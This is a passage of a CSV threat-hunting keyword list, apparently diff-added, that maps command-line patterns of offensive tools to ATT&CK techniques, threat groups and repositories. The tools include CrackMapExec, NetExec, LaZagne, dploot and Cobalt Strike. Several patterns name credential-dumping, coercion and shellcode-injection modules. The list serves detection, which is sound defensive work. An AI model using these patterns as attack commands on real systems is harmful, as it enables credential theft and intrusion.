Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"* -M multirdp*","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"* -M nanodump *","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"* -m olecmd -o *powershell *","offensive_tool_keyword","SQLRecon","A C# MS SQL toolkit designed for offensive reconnaissance and post-exploitation","T1003.003 - T1049 - T1059.005 - T1078.003","TA0005 - TA0006 - TA0002 - TA0004","N/A","N/A","Network Exploitation Tools","https://github.com/skahwah/SQLRecon","1","0","N/A","N/A","6","502","97","2023-08-10T00:42:31Z","2021-11-19T15:58:49Z" +"* -M pe_inject*","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"* -M petitpotam *","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"* -M petitpotam*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"* -M printnightmare *","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"* -m privileged-users --full *","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"* -M procdump ","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"* -m rdrleakdiag -M masterkeys*","offensive_tool_keyword","dploot","DPAPI looting remotely in Python","T1003.006 - T1027 - T1110.004","TA0006 - TA0007 - TA0010","N/A","N/A","Credential Access","https://github.com/zblurx/dploot","1","0","N/A","10","3","279","23","2023-09-30T11:10:26Z","2022-05-24T11:05:21Z" +"* -m run_command -c *.exe*","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety of .NET formatters","T1059.007 - T1027.002 - T1059.001","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/pwntester/ysoserial.net","1","0","N/A","10","10","2726","442","2023-06-27T12:08:11Z","2017-09-18T17:48:08Z" +"* -M runasppl *","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"* -M scuffy -o SERVER=127.0.0.1*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"* -M scuffy*","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"* -M shadowcoerce *","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"* -M shadowcoerce*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"* -M shellcode_inject*","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"* -m SimpleHTTPServer *","greyware_tool_keyword","simplehttpserver","quick web server in python","T1021.002 - T1059.006","TA0002 - TA0005","N/A","N/A","Data Exfiltration","https://docs.python.org/2/library/simplehttpserver.html","1","0","N/A","6","10","N/A","N/A","N/A","N/A" +"* -M slinky","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"* -M slinky -o SERVER=*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"* -M spider_plus *","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"* -M spider_plus -o MAX_FILE_SIZE=100*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"* -M teams_localdb *","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"* -M tokens*","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"* -M uac","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"* -m venv csexec *","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","0","private github repo","10",,"N/A",,, +"* -M wdigest -o ACTION=disable*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"* -M wdigest -o ACTION=enable*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"* -M web_delivery*","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"* -M zerologon *","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"* m3-gen.py *","offensive_tool_keyword","MaliciousMacroMSBuild","Generates Malicious Macro and Execute Powershell or Shellcode via MSBuild Application Whitelisting Bypass.","T1059.001 - T1059.003 - T1127 - T1027.002","TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/infosecn1nja/MaliciousMacroMSBuild","1","0","N/A","8","5","488","117","2019-08-06T08:16:05Z","2018-04-09T23:16:30Z" +"* malleable.profile*","offensive_tool_keyword","cobaltstrike","Cobalt Strike C2 Reverse proxy that fends off Blue Teams. AVs. EDRs. scanners through packet inspection and malleable profile correlation","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/mgeeky/RedWarden","1","0","N/A","10","10","821","139","2022-10-07T14:05:25Z","2021-05-15T22:05:39Z" +"* malleable-c2-randomizer*","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","0","N/A","10","10","421","96","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" +"* mask?a?a?a?a?*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"* --mask=?1?1?1* --min-len*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"* --max-attack-time*","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/wapiti-scanner/wapiti","1","0","N/A","N/A","8","785","132","2023-10-04T14:09:48Z","2020-06-06T20:17:55Z" +"* maxdb-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* mcafee-epo-agent.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* -mdns y -mdnsunicast n*","offensive_tool_keyword","Inveigh",".NET IPv4/IPv6 machine-in-the-middle tool for penetration testers","T1550.002 - T1059.001 - T1071.001","TA0002","N/A","N/A","Sniffing & Spoofing","https://github.com/Kevin-Robertson/Inveigh","1","0","N/A","10","10","2212","441","2023-06-13T01:36:42Z","2015-04-02T18:04:41Z" +"* -mDNSTTL *","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"* membase-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* membase-http-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* memcached-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* memorpy *","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"* memorydump.py*","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1552 - T1003 - T1555","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/AlessandroZ/LaZagne","1","0","N/A","10","10","8530","1980","2023-08-12T12:38:22Z","2015-02-16T14:10:02Z" +"* memreader.c *","offensive_tool_keyword","cobaltstrike","MemReader Beacon Object File will allow you to search and extract specific strings from a target process memory and return what is found to the beacon output","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trainr3kt/MemReader_BoF","1","0","N/A","10","10","26","3","2022-05-12T18:46:02Z","2021-04-21T20:51:25Z" +"* MemReader_BoF*","offensive_tool_keyword","cobaltstrike","MemReader Beacon Object File will allow you to search and extract specific strings from a target process memory and return what is found to the beacon output","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trainr3kt/MemReader_BoF","1","0","N/A","10","10","26","3","2022-05-12T18:46:02Z","2021-04-21T20:51:25Z" +"* merlin.py *","offensive_tool_keyword","mythic","Cross-platform post-exploitation HTTP Command & Control agent written in golang","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - T1204","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/merlin","1","0","N/A","10","10","58","10","2023-08-11T15:02:23Z","2021-01-25T12:36:46Z" +"* met_inject*","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"* metasploit-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* metasploit-msgrpc-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* metasploit-xmlrpc-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* -method * -nthash *","offensive_tool_keyword","LdapRelayScan","Check for LDAP protections regarding the relay of NTLM authentication","T1595 T1590 T1591","N/A","N/A","N/A","Reconnaissance","https://github.com/zyn3rgy/LdapRelayScan","1","0","N/A","8","4","390","51","2023-09-04T05:43:00Z","2022-01-16T06:50:44Z" +"* Microsploit.sh*","offensive_tool_keyword","BruteSploit","Fast and easy create backdoor office exploitation using module 